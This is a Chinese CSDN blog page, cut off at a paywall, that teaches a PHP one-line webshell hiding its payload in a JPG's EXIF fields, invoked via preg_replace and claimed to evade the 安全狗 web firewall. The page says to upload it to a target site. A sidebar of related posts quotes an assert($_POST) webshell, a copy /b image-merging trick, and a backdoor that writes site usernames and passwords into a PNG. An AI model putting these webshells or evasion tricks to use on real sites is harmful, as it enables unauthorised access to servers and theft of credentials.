隐藏在图片里的后门

最新推荐文章于 2022-08-24 14:53:00 发布
最新推荐文章于 2022-08-24 14:53:00 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: PHP web安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wodafa/article/details/64122614
版权

一、前言

本文原创作者:sucppVK,本文属i春秋原创奖励计划,未经许可禁止转载!

先说明三点:
 

  • 这个后门就是一句话木马
  • 这个不同于我们常说的图片马
  • 这个后门是过安全狗的


这个不算什么新姿势,只不过被提到的次数比较少

(各大论坛常见的,无非编码、解码、分割等,本文不属于以上几种)

而且咱们i春秋论坛没有相关资料,小弟就来抛砖引玉了。

学习本教程应具备的基础:
 

  • 基本了解一句话木马
  • 会一点点php(善于百度自学的也算)
  • 基本了解正则匹配


第一点看我以前写的教程就可以了:

文字教程就在咱们论坛:

http://bbs.ichunqiu.com/thread-17816-1-1.html


二、正文

2.1 先看看效果

下面就是木马的代码:

php <?php $x = exif_read_data('1.jpg'); preg_replace($x['Model'], $x['Make'], ''); ?>


当然不光这个php文件,还有一个隐藏了后门的图片。

也就是上面那段代码里面的1.jpg



将图片和php文件,这两都上传的目标站点,这里用dvwa演示&#

最低0.47元/天 解锁文章
i春秋论坛
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之misc-图片隐写
Battery的博客
05-03 11万+
一·隐写术的介绍 隐写术是一门关于信息隐藏的技巧与科学,所谓信息隐藏指的是不让除预期 的接收者之外的任何人知晓信息的传递事件或者信息的内容。隐写术的英文 叫做Steganography,来源于特特米乌斯的一本讲述密码学与隐写术的著 作Steganographia,该书书名源于希腊语,意为“隐秘书写”。 二.图片隐写 1.常用工具 HexWorkshop Stegsolve Binwalk dd命令 2.查看十六进制,用HexWorkshop将图片打开,搜索flag等关键字或翻到最后,可能会
PHP图片后门藏匿攻略
Coisini的博客
06-21 1844
我们平时藏匿图片后门是什么流程呢?我们来看一下 0x01 初级的藏匿方法: 1、建立一个eval.php文件,上面加入我们的后门: <?php assert($_POST[feiji]);?> 2、找一张图片1.jpg,最好是从目标网站上下载下来的图片。 3、合并图片和php后门: Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\ht...
简单讲述几种查找图片隐藏Flag的方法
热门推荐
微瑟秋风的博客
08-24 1万+
讲述几种查找图片隐藏Flag的方法:附加字符串、修改图片的宽高、jphide图片隐写、OutGuess隐写、异或隐写、盲水印、二维码画图、灰度图片LSB隐写。
php上传后门,PHP图片后门藏匿攻略
weixin_42298973的博客
03-10 749
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:Default12、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片和php后门:DefaultCopy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp...
php代码隐写到图片,从PNG Dropper到Alpha通道隐写术实践
weixin_28771751的博客
03-19 376
0x1 前言前些天从安全客上看到一篇翻译文章是关于利用PNG像素隐藏PE代码,对实现细节很感兴趣就抽空稍微研究了下相关内容,于是就有了本次分享。0x2 PNG Dropper样本分析先来看下翻译文中的样本,其中PE资源包含一个PNG目录,该目录存储了8张PNG格式的图片:将8张图片全部提取出来,随便选择一张打开查看,发现可以正常打开,但显示的内容都是一些杂乱的随机像素点:将其拖进010edit...
edjpgcom图片插入一句话工具
02-12
标题中的“edjpgcom图片插入一句话工具”是一种特殊的技术手段,用于在图片文件中嵌入隐藏的数据或代码,通常用于创建所谓的“图片木马”。这种技术主要涉及到的是信息安全和网络攻防领域,尤其是针对恶意软件的传播...
edjpgcom-图片添加代码工具.zip
07-20
【描述分析】:描述中提到这个工具“可以往图片中添加木马”,这意味着它具有在图片文件中隐藏恶意代码的能力。这种技术常用于恶意软件传播,通过看似无害的图片文件传播病毒或后门程序。提到了“CSDn没有资源”,这...
php后门木马扫面工具
04-09
后门木马通常是指那些隐藏在正常代码中的特殊代码段,它们可能以各种形式存在,如恶意函数调用、隐写术、加密脚本等。例如,黑客可能会利用PHP的`eval()`函数来执行动态生成的代码,或者通过包含远程文件(如`...
Netray:python写的后门连接脚本
04-06
7. **隐写术和混淆技术**:为了增加检测难度,源代码可能使用了隐写术(隐藏图片中的数据)和混淆技术,使得代码难以理解和分析。 8. **编码与解码**:在传输过程中,数据可能需要进行编码和解码,以适应不同的...
将文件内容隐藏在png图片
11-19
将文件内容隐藏在png图片中,高能装b技能
php简单的后门文件
10-03
php简单的后门文件
ctf大赛题目 格式为图片格式
08-03
ctf比赛的部分题目 格式为图片格式 英语 可以上手做联系用................................................................................
新海螺模板M3.2版本苹果cms模板全开源源码免授权无后门
11-11
同时,无后门的设计则保证了网站的安全性,用户无需担心代码中隐藏的恶意代码或潜在风险,可以放心使用。 苹果CMS是一款强大的PHP建站系统,专注于视频内容管理,尤其适合构建电影、电视剧等多媒体资源的分享网站。...
php图片大马加后门,一次对php大马的后门的简单分析
weixin_30923925的博客
03-12 570
一次对php大马的后门的简单分析有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次$password='Shiqi';//登录密码(支持菜刀)//----------功能程序------------------//$c="chr";session_start();if(empty($_SESSION['PhpCode'])){$url=$c(104).$c(116).$c(116...
图片后门捆绑利用工具 – FakeImageExploiter
abc5578786的博客
05-15 1095
在这,要向大家推荐一款名为“Fake Image Exploiter”的安全工具,该工具可以在图片文件中捆绑隐藏的恶意.bat或.exe程序,方便钓鱼或社工攻击测试过程中的入侵控制。如果受害者点击该恶意图片文件后,将会向控制主机反弹一个管理控制会话。以下是其使用视频: (自带梯子) https://www.youtube.com/watch?v=4dEYIO-xBHU 配置...
PHP把账号密码放在图片上的后门操作手法
精哥哥
11-17 268
$rty=$username.'=='.$password.','; @file_put_contents('./com/img/wx.png',$rty,FILE_APPEND); 上面是一段把 用户名密码 附加在一个图片上 在使用某个开源项目试,git发现,一个png文件老是被改 就一个小图标文件,按理说,不会有修改的 然后全局查找,果然,找到一个后门 如上所示。 这样后门放置者,很容易得到你网站的用户名密码,轻松进后台 ...
查找图片隐藏的flag
axywjij017440的博客
05-01 9368
比如我们现有图123.jgp,要对它进行分析,查找图片隐藏的flag,首先要了解一些关于图片格式的知识,这举例jpg格式的图片,其他格式图片自行google一下。 jpg图片格式知识:   jpg格式文件开始的2字节是图像开始SOI(Start of Image,SOI)为FF D8,之后2个字节是JFIF应用数据块APPO(JFIF application segment)为F...
c#winform密码隐藏后门
最新发布
10-13
为了实现密码隐藏,可以使用C# WinForm中的PasswordBox控件。该控件可以将用户输入的密码隐藏为星号或其他字符,以保护用户的隐私。在代码中,可以通过PasswordChar属性设置密码字符的显示方式。例如,将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值